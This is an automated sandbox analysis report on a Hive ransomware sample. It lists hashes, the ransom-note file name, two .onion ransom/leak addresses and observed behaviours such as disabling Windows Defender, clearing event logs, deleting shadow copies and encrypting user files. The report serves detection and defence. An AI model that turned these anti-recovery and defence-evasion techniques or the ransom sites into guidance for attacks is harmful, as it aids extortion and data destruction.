Analysis
-
max time kernel
163s -
max time network
125s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 16:59
Static task
static1
Behavioral task
behavioral1
Sample
3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe
Resource
win7-en-20211208
General
-
Target
3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe
-
Size
2.6MB
-
MD5
f37ac3d17e22b105ee4648676fb336b2
-
SHA1
75c3d318d196aaf8c6b129ef10677b9495c1cfd6
-
SHA256
3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43
-
SHA512
cd08c48fa3646b610d28046ef9b75ca7418acc607f7408e1ad6fa1b9390e98e01e07e4be0dad131186c7027c6a1c4a058b6b7123812eb524a0a8d28802b458a2
Malware Config
Extracted
C:\iotb_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 4504 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 16 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exedescription ioc process File renamed C:\Users\Admin\Pictures\SuspendGroup.raw => C:\Users\Admin\Pictures\SuspendGroup.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_jwgkfQeogic0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Users\Admin\Pictures\DisableRepair.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VbyinVoK6_A0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File renamed C:\Users\Admin\Pictures\InitializeRename.crw => C:\Users\Admin\Pictures\InitializeRename.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_Au01VTEL14o0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Users\Admin\Pictures\ReceiveConvertFrom.tiff.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_k6f4zI7Qmuc0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Users\Admin\Pictures\SyncAssert.tif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_fjjmv4gMASc0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File renamed C:\Users\Admin\Pictures\OptimizeRename.raw => C:\Users\Admin\Pictures\OptimizeRename.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_9V2afMISh_s0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Users\Admin\Pictures\OptimizeRename.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_9V2afMISh_s0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File renamed C:\Users\Admin\Pictures\ReceiveConvertFrom.tiff => C:\Users\Admin\Pictures\ReceiveConvertFrom.tiff.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_k6f4zI7Qmuc0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File renamed C:\Users\Admin\Pictures\SelectDebug.raw => C:\Users\Admin\Pictures\SelectDebug.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_FJ_HFkhsilo0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Users\Admin\Pictures\SelectDebug.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_FJ_HFkhsilo0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Users\Admin\Pictures\SuspendGroup.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_jwgkfQeogic0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File renamed C:\Users\Admin\Pictures\DisableRepair.crw => C:\Users\Admin\Pictures\DisableRepair.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VbyinVoK6_A0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Users\Admin\Pictures\InitializeRename.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_Au01VTEL14o0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File renamed C:\Users\Admin\Pictures\SyncAssert.tif => C:\Users\Admin\Pictures\SyncAssert.tif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_fjjmv4gMASc0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File renamed C:\Users\Admin\Pictures\CompareUninstall.png => C:\Users\Admin\Pictures\CompareUninstall.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_al6f_PxsOGY0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Users\Admin\Pictures\CompareUninstall.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_al6f_PxsOGY0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exedescription ioc process File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\StandardMSDNR_Retail-pl.xrm-ms.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_CtuFolQ6xGE0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailMediumTile.scale-200.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\digsig_icons_2x.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_WXrcawFx_2Q0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\iotb_HOW_TO_DECRYPT.txt 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ul-phn.xrm-ms.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_WEhlYkzA8EM0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\mask\1h.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\western_cardback.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-48_altform-unplated.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_dkFSCA3qJmc0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ko-kr\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_WJ6r73KGnOM0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VpNJHtFK5Qk0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\1250_20x20x32.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\3009_32x32x32.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\resources.pri 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-cn\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_M8AQ4flckP40.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files (x86)\Internet Explorer\es-ES\ieinstal.exe.mui 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\HowToPlay\FreeCell\Control_10.jpg 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\ContemporaryPhotoAlbum.potx.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_KZWkpXKGsNk0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\AppxManifest.xml 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailBadge.scale-125.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_reportabuse-default_18.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_UX1uN7dth3Q0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lt_get.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_ykmScO5HkiE0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\sl\iotb_HOW_TO_DECRYPT.txt 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.GrayF.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_uTmkZukAU_Q0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_Zha7z8wgPHI0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\8080_36x36x32.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSectionSmallTile.scale-200.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\iotb_HOW_TO_DECRYPT.txt 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\iotb_HOW_TO_DECRYPT.txt 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_J_em_jQ1DPM0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\starttile.dualsim2.surprise.small.scale-150.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ro-ro\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_-GApP492Hv00.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\es-ES\TipTsf.dll.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_QW4M2iW4_Ds0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2017.125.40.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraLargeTile.contrast-white_scale-125.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.News\Assets\news_button_down.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-256.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Advanced-Dark.scale-200.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_comment_18.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_lh994_VVNCk0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\boot_zh_CN.jar.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VxylmRYVR3g0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\GB.XSL.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_kfXk-VELlvg0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\add_reviewer.gif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_FEsyvLrj3dk0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\iotb_HOW_TO_DECRYPT.txt 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Grace-ul-oob.xrm-ms.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_hxE_XqRD4HU0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Aquarium\mask\1h.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\Internet Explorer\es-ES\iexplore.exe.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_yCiK8woPxW40.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorSmallTile.contrast-black_scale-200.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SplashScreen.scale-100_contrast-white.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.scale-150.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner.gif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_dEDn0gCdCsI0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\sl_get.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_I1aRWYAqGdk0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-140_8wekyb3d8bbwe\Assets\Office\settle.scale-140.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\time.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe\Assets\contrast-white\Logo.scale-200_contrast-white.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\PlayStore_icon.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_zTnuhdtL9LE0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files (x86)\Common Files\System\ado\msador28.tlb 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sampler.xml.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_jZ0BdjJ05Eg0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\FileIcons\FileLogoExtensions.targetsize-20.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.Background.winmd 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\WideTile.scale-100.png 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\It.snippets.ps1xml 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_MGg0nr6cMIs0.j2xnp 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3652 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 616 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exe3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exepid process 3320 powershell.exe 3320 powershell.exe 3320 powershell.exe 2868 powershell.exe 2868 powershell.exe 2868 powershell.exe 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 4064 wevtutil.exe Token: SeBackupPrivilege 4064 wevtutil.exe Token: SeSecurityPrivilege 3192 wevtutil.exe Token: SeBackupPrivilege 3192 wevtutil.exe Token: SeSecurityPrivilege 4176 wevtutil.exe Token: SeBackupPrivilege 4176 wevtutil.exe Token: SeIncreaseQuotaPrivilege 4172 wmic.exe Token: SeSecurityPrivilege 4172 wmic.exe Token: SeTakeOwnershipPrivilege 4172 wmic.exe Token: SeLoadDriverPrivilege 4172 wmic.exe Token: SeSystemProfilePrivilege 4172 wmic.exe Token: SeSystemtimePrivilege 4172 wmic.exe Token: SeProfSingleProcessPrivilege 4172 wmic.exe Token: SeIncBasePriorityPrivilege 4172 wmic.exe Token: SeCreatePagefilePrivilege 4172 wmic.exe Token: SeBackupPrivilege 4172 wmic.exe Token: SeRestorePrivilege 4172 wmic.exe Token: SeShutdownPrivilege 4172 wmic.exe Token: SeDebugPrivilege 4172 wmic.exe Token: SeSystemEnvironmentPrivilege 4172 wmic.exe Token: SeRemoteShutdownPrivilege 4172 wmic.exe Token: SeUndockPrivilege 4172 wmic.exe Token: SeManageVolumePrivilege 4172 wmic.exe Token: 33 4172 wmic.exe Token: 34 4172 wmic.exe Token: 35 4172 wmic.exe Token: 36 4172 wmic.exe Token: SeIncreaseQuotaPrivilege 4344 wmic.exe Token: SeSecurityPrivilege 4344 wmic.exe Token: SeTakeOwnershipPrivilege 4344 wmic.exe Token: SeLoadDriverPrivilege 4344 wmic.exe Token: SeSystemProfilePrivilege 4344 wmic.exe Token: SeSystemtimePrivilege 4344 wmic.exe Token: SeProfSingleProcessPrivilege 4344 wmic.exe Token: SeIncBasePriorityPrivilege 4344 wmic.exe Token: SeCreatePagefilePrivilege 4344 wmic.exe Token: SeBackupPrivilege 4344 wmic.exe Token: SeRestorePrivilege 4344 wmic.exe Token: SeShutdownPrivilege 4344 wmic.exe Token: SeDebugPrivilege 4344 wmic.exe Token: SeSystemEnvironmentPrivilege 4344 wmic.exe Token: SeRemoteShutdownPrivilege 4344 wmic.exe Token: SeUndockPrivilege 4344 wmic.exe Token: SeManageVolumePrivilege 4344 wmic.exe Token: 33 4344 wmic.exe Token: 34 4344 wmic.exe Token: 35 4344 wmic.exe Token: 36 4344 wmic.exe Token: SeIncreaseQuotaPrivilege 4344 wmic.exe Token: SeSecurityPrivilege 4344 wmic.exe Token: SeTakeOwnershipPrivilege 4344 wmic.exe Token: SeLoadDriverPrivilege 4344 wmic.exe Token: SeSystemProfilePrivilege 4344 wmic.exe Token: SeSystemtimePrivilege 4344 wmic.exe Token: SeProfSingleProcessPrivilege 4344 wmic.exe Token: SeIncBasePriorityPrivilege 4344 wmic.exe Token: SeCreatePagefilePrivilege 4344 wmic.exe Token: SeBackupPrivilege 4344 wmic.exe Token: SeRestorePrivilege 4344 wmic.exe Token: SeShutdownPrivilege 4344 wmic.exe Token: SeDebugPrivilege 4344 wmic.exe Token: SeSystemEnvironmentPrivilege 4344 wmic.exe Token: SeRemoteShutdownPrivilege 4344 wmic.exe Token: SeUndockPrivilege 4344 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
